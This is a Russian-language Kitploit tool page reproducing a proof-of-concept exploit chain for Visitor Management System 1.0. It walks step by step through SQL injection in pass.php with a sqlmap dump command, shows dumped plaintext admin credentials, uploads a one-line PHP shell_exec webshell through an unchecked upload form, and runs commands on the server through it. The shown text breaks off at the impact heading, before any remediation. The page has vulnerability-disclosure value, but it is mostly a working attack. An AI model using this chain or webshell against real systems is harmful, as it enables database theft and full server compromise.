Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10170-RCE — Доказательство концепции, демонстрирующее SQL-инъекцию и неограниченную загрузку файлов, объединённые для достижения удалённого выполнения кода в Visitor Management System 1.0, включая пошаговую эксплуатацию и рекомендации по устранению уязвимостей. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-10170-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubxmyronn/cve-2026-10170-rce

CVE-2026-10170-RCE

Доказательство концепции, демонстрирующее SQL-инъекцию и неограниченную загрузку файлов, объединённые для достижения удалённого выполнения кода в Visitor Management System 1.0, включая пошаговую эксплуатацию и рекомендации по устранению уязвимостей.

Репозиторий
85 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Visitor Management System 1.0 — SQLi до удалённого выполнения кода (цепочка атак)

Информация об уязвимости

ПолеДетали
ПродуктVisitor Management System
Вендорcode-projects.org
Версия1.0
Классы уязвимостейSQL-инъекция (CWE-89) + неограниченная загрузка файлов (CWE-434)
ID CVEОжидается
Оценка CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Требуемая аутентификацияНизкие привилегии (учётная запись охранника) как точка входа
Затронутые файлы/vms/php/pass.php, /vms/php/admin_user_0.php
Уязвимый параметрphone (POST)

Описание

Visitor Management System 1.0 от code-projects.org уязвим к критической цепочке атак, объединяющей SQL-инъекцию и неограниченную загрузку файлов, что приводит к удалённому выполнению кода.

Злоумышленник с доступом низкого уровня (учётная запись охранника) может использовать SQL-инъекцию в pass.php через POST-параметр phone, чтобы выгрузить всю базу данных — включая учётные данные администратора в открытом виде. Используя извлечённые учётные данные для входа в качестве администратора, злоумышленник может затем загрузить PHP-вебшелл через панель управления пользователями администратора (admin_user_0.php), которая не выполняет проверку типа файла или расширения. Загруженный вебшелл сохраняется в каталоге, доступном через веб, и может быть выполнен напрямую по URL, что приводит к полному удалённому выполнению кода на сервере.

Кроме того, пароли хранятся в базе данных в открытом виде, что означает отсутствие необходимости в подборе хешей после выгрузки данных через SQLi.


Обзор цепочки атак

Вход охранника с низкими привилегиями
        ↓
SQL-инъекция в pass.php (параметр phone)
        ↓
Выгрузка через sqlmap → извлечены учётные данные администратора в открытом виде
        ↓
Вход в качестве администратора (sanjay1:7861)
        ↓
Неограниченная загрузка файлов в admin_user_0.php
        ↓
PHP-вебшелл загружен в /vms/php/folder/
        ↓
RCE через ?cmd=whoami → полный компрометация сервера

Пошаговое доказательство концепции

Шаг 1 — Вход в качестве пользователя с низкими привилегиями (охранник)

Перейдите к приложению VMS и войдите с учётными данными охранника. После входа перейдите на страницу номера телефона:

http://<TARGET>/vms/php/phone_0.php
Screenshot 2026-05-05 034206

Шаг 2 — Подтверждение SQL-инъекции в pass.php

Отправьте одинарную кавычку ' в качестве значения номера телефона. Приложение выдаёт фатальную ошибку MariaDB, раскрывающую исходный запрос и путь к файлу:

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '2026-05-05'' at line 1 in 
C:\xampp\htdocs\vms\php\pass.php:9
Stack trace:
#0 C:\xampp\htdocs\vms\php\pass.php(9): mysqli_query(Object(mysqli), 'select * from i...')

Затронутый файл: pass.php, строка 9
Уязвимый параметр: phone (POST)

Screenshot 2026-05-05 034215

sql error Screenshot 2026-05-05 034228


Шаг 3 — Эксплуатация SQLi с помощью sqlmap

Сохраните перехваченный в Burp Suite запрос в файл (sqli.txt) и запустите sqlmap:

sqlmap -r sqli.txt --dump --batch

sqlmap успешно выгружает таблицу login_user из базы данных vms, раскрывая учётные данные в открытом виде для всех пользователей:

Database: vms
Table: login_user
[2 entries]
+----+---------+------------+---------+-------+--------+----------+-----------+
| id | image   | phone      | name    | user  | gender | password | username  |
+----+---------+------------+---------+-------+--------+----------+-----------+
| 1  | <blank> | 8146905071 | sanjay  | guard | male   | 786      | sanjay123 |
| 2  | <blank> | 8146905071 | sanjay1 | admin | male   | 7861     | sanjay1   |
+----+---------+------------+---------+-------+--------+----------+-----------+

Примечание: пароли хранятся в открытом виде — подбор хешей не требуется.

Screenshot 2026-05-05 034316

Шаг 4 — Вход в качестве администратора

Используя извлечённые учётные данные администратора, войдите в панель администратора:

Username: sanjay1
Password: 7861

Теперь доступна полная панель администратора, включая управление сотрудниками, отделами, пользователями администратора и отчётами.

Screenshot 2026-05-05 034353

Шаг 5 — Загрузка PHP-вебшелла через панель пользователей администратора

Перейдите на страницу управления пользователями администратора:

http://<TARGET>/vms/php/admin_user_0.php

Страница содержит поле загрузки файла для изображения профиля. Приложение не выполняет проверку типа файла, не фильтрует расширения и не проверяет MIME-тип.

Заполните форму любыми значениями и загрузите следующий PHP-вебшелл в качестве файла изображения (web2_command.php):

<?php echo shell_exec($_GET['cmd']); ?>
Screenshot 2026-05-05 034416

Шаг 6 — Подтверждение загрузки вебшелла

Перейдите на страницу отображения пользователей администратора:

http://<TARGET>/vms/php/admin_display_0.php

Новая созданная учётная запись администратора видна в таблице. Загруженный вебшелл сохраняется по адресу:

http://<TARGET>/vms/php/folder/web2_command.php
Screenshot 2026-05-05 034429

Шаг 7 — Удалённое выполнение кода

Выполните произвольные системные команды через вебшелл:

http://<TARGET>/vms/php/folder/web2_command.php?cmd=whoami

Результат: сервер возвращает текущего системного пользователя, подтверждая полное удалённое выполнение кода:

desktop-g1i9np3\dell
Screenshot 2026-05-05 034438

Воздействие

Скачать инструмент